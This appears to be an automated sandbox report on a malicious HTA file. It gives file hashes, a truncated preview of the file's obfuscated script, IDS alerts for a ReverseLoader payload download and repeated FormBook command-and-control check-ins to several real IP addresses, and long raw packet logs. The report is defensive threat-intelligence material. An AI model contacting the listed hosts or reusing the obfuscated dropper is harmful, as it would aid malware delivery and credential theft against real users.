                                                                                                                                                      Preview:...... . . . .....B.b.q.L.L.G.m.L.W.Q.a.O.G.J.K. .=. .".A.N.O.J.i.c.U.G.L.k.Z.L.G.t.e.".....h.L.z.K.c.c.P.g.N.Z.i.q.d.l.O. .=. .".Z.I.t.z.J.W.u.K.L.c.B.m.A.L.U.".....O.b.s.L.G.h.u.K.c.q.z.k.i.u.L. .=. .".i.W.l.W.m.G.z.r.c.r.s.k.e.o.U.".........I.c.h.L.p.N.P.k.L.c.i.H.s.P.L. .=. .".h.t.G.t.u.W.j.z.d.d.G.S.i.T.h.".....o.o.C.W.U.L.k.A.k.b.P.c.p.J.K. .=. .".L.p.m.C.z.r.u.m.L.C.W.B.U.G.i.".....e.x.R.o.W.Q.c.B.z.A.e.W.N.B.L. .=. .".K.i.B.J.e.L.x.x.L.W.v.W.L.q.q.".....L.e.H.K.c.L.H.k.z.h.h.R.e.h.o. .=. .".l.W.N.g.e.u.t.t.W.z.K.z.o.L.k.".....i.i.k.P.e.n.c.i.G.N.n.j.a.g.e. .=. .".W.R.q.m.k.z.U.R.i.K.x.f.e.K.B.".....L.A.d.s.L.k.Z.z.z.r.q.L.G.a.N. .=. .".R.b.c.N.Z.i.L.u.z.P.v.c.f.A.K.".....e.n.W.L.L.K.p.n.s.L.h.c.i.x.G. .=. .".L.O.W.p.q.n.p.p.k.C.i.Q.q.W.Z.".....P.c.c.n.u.W.U.k.G.L.a.L.Z.L.d. .=. .".b.p.i.k.G.W.i.i.L.i.k.W.a.e.U.".....N.C.P.C.x.L.W.U.B.L.R.J.x.v.c. .=. .".O.L.W.b.p.b.r.R.h.S.G.U.P.R.A.".....W.N.d.C.K.q.c.L.Z.d.L.N.h.p.I. .=. .".b.l.t.e.K.n.R.A.B.W.i.m.Q.n.L.".....W.x.U.J.i.i.e.c.
                                                                                                                                                      File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                      Entropy (8bit):2.149546896656599
                                                                                                                                                      TrID:
                                                                                                                                                        File name:maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta
                                                                                                                                                        File size:159'618 bytes
                                                                                                                                                        MD5:7b5d04515a8b84877cd75427ec392b85
                                                                                                                                                        SHA1:6013f960a5832b92b2ee8347c208761dc0a24d58
                                                                                                                                                        SHA256:e639ef803c3d793f9f0f3a9e4bca874b78e278f9be248103b7a691dbbfbf7b69
                                                                                                                                                        SHA512:0afb384e76c071079eca07174cf301ef85c3f62b928bf1604939bd6697576844061f7d2c385f1ef388b4b6f7f3ca7d7d9764996715d36750122d26bfd6d94653
                                                                                                                                                        SSDEEP:96:4owZw9d6yfajsbUoJ3S46INpy7AE5INVWa2pCbFCbUoJ3S46INpy7AD5INVWa2p5:4Lwaq+xOixqDckQ
                                                                                                                                                        TLSH:15F3C341E93400EDFAFD5E9BB5BDA54E35A423579FC99D8D4227FB80D8A338EA4408C4
                                                                                                                                                        File Content Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%252
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-05T05:37:58.770647+0100 | 2858795 | ETPRO MALWARE ReverseLoader Payload Request (GET) M2 | 1 | 192.168.2.6 | 49707 | 172.245.123.3 | 80 | TCP
2024-12-05T05:38:53.469246+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49821 | 208.91.197.27 | 80 | TCP
2024-12-05T05:39:10.722550+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49863 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:13.388616+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49870 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:16.040314+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49876 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:18.701814+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49886 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:25.456038+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49903 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:28.113587+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49910 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:30.770847+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49917 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:33.432874+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49923 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:40.396437+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49940 | 104.21.31.249 | 80 | TCP
2024-12-05T05:39:43.051583+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49947 | 104.21.31.249 | 80 | TCP
2024-12-05T05:39:45.708858+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49955 | 104.21.31.249 | 80 | TCP
2024-12-05T05:39:48.442295+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49963 | 104.21.31.249 | 80 | TCP
2024-12-05T05:39:55.294162+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49977 | 3.33.130.190 | 80 | TCP
2024-12-05T05:39:57.962029+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49984 | 3.33.130.190 | 80 | TCP
2024-12-05T05:40:00.619088+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49991 | 3.33.130.190 | 80 | TCP
2024-12-05T05:40:03.279319+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49999 | 3.33.130.190 | 80 | TCP
2024-12-05T05:40:10.150210+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50005 | 162.213.249.216 | 80 | TCP
                                                                                                                                                        2024-12-05T05:40:12.810690+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650006162.213.249.21680TCP
                                                                                                                                                        2024-12-05T05:40:15.691616+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650008162.213.249.21680TCP
                                                                                                                                                        2024-12-05T05:40:18.370663+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650009162.213.249.21680TCP
                                                                                                                                                        2024-12-05T05:40:25.293933+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001062.149.128.4080TCP
                                                                                                                                                        2024-12-05T05:40:27.948398+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001162.149.128.4080TCP
                                                                                                                                                        2024-12-05T05:40:30.771520+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001262.149.128.4080TCP
                                                                                                                                                        2024-12-05T05:40:33.261303+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65001362.149.128.4080TCP
                                                                                                                                                        2024-12-05T05:40:39.986732+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500143.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:42.635660+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500153.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:45.288783+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500163.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:47.944401+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500183.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:54.793403+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500193.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:40:57.448428+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500203.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:41:00.248282+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500213.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:41:02.765732+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500223.33.130.19080TCP
                                                                                                                                                        2024-12-05T05:41:10.286313+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650023154.82.100.17780TCP
                                                                                                                                                        2024-12-05T05:41:12.942530+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650024154.82.100.17780TCP
                                                                                                                                                        2024-12-05T05:41:15.614420+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650025154.82.100.17780TCP
                                                                                                                                                        2024-12-05T05:41:18.279464+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650026154.82.100.17780TCP
                                                                                                                                                        2024-12-05T05:41:25.333244+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650028199.115.230.22280TCP
                                                                                                                                                        2024-12-05T05:41:27.989483+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650029199.115.230.22280TCP
                                                                                                                                                        2024-12-05T05:41:30.645739+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650030199.115.230.22280TCP
                                                                                                                                                        2024-12-05T05:41:53.689481+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650031199.115.230.22280TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                        Dec 5, 2024 05:37:59.204667091 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.204708099 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.204750061 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.209362030 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.209409952 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.209491968 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.209534883 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.214103937 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.214148998 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.214205980 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.214246035 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.218827009 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.218871117 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.218934059 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.218975067 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.223525047 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.223568916 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.223645926 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.223686934 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.228260040 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.228301048 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.228353977 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.228393078 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.233017921 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.233061075 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.233119965 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.233160019 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.237790108 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.237838984 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.237840891 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.237869024 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.346940994 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.347012043 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.347080946 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.347116947 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.348977089 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.349041939 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.349078894 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.349117041 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.353156090 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.353199959 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.353276968 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.353322983 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.357207060 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.357253075 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.357353926 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.357398033 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.361296892 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.361341000 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.361409903 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.361453056 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.365401983 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.365447998 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.365506887 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.365550995 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.369508982 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.369553089 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.369635105 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.369678974 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.373593092 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.373636961 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.373673916 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.373718977 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.377718925 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.377764940 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.377827883 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.377867937 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.381812096 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.381860018 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.381937027 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.381978035 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.385937929 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.385981083 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.386039019 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.386080980 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.390022993 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.390067101 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.390099049 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.390135050 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.394153118 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.394201040 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.394295931 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.394339085 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.398232937 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.398273945 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.398335934 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.398376942 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.402339935 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.402385950 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.402456045 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.402498007 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.406447887 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.406497955 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.406558990 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.406599045 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.410048962 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.410094976 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.410162926 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.410233974 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.413647890 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.413697004 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.413817883 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.413861990 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.417270899 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.417316914 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.417402029 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.417448044 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.421040058 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.421082973 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.421216011 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.421257973 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.424561024 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.424604893 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.424776077 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.424818039 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.428106070 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.428174973 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.428222895 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.428267956 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.431701899 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.431747913 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.431798935 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.431838036 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.435307026 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.435350895 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:37:59.435425997 CET8049707172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:37:59.435468912 CET4970780192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.688028097 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.691637993 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.691751957 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.691797018 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.695435047 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.695544004 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.695590019 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.699167967 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.699290991 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.699337959 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.702896118 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.703016996 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.703061104 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.706695080 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.706779003 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.706824064 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.710426092 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.710520983 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.710567951 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.714188099 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.714364052 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.714410067 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.717910051 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.718019009 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.718064070 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.721698046 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.721770048 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.721817017 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.725409985 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.725517988 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.725560904 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.729172945 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.729285955 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.729326963 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.732923031 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.733006954 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.733048916 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.736655951 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.736769915 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.736813068 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.740422964 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.740505934 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.741662025 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.744177103 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.744266033 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.744313002 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.747925043 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.748045921 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.748090982 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.751693010 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.751786947 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.751831055 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.755398035 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.755513906 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.755569935 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.759125948 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.801038980 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.837315083 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.837435961 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.837491035 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.838229895 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.838309050 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.838354111 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.841340065 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.841381073 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.841424942 CET4975980192.168.2.6172.245.123.3
                                                                                                                                                        Dec 5, 2024 05:38:28.843703985 CET8049759172.245.123.3192.168.2.6
                                                                                                                                                        Dec 5, 2024 05:38:28.843863010 CET8049759172.245.123.3192.168.2.6
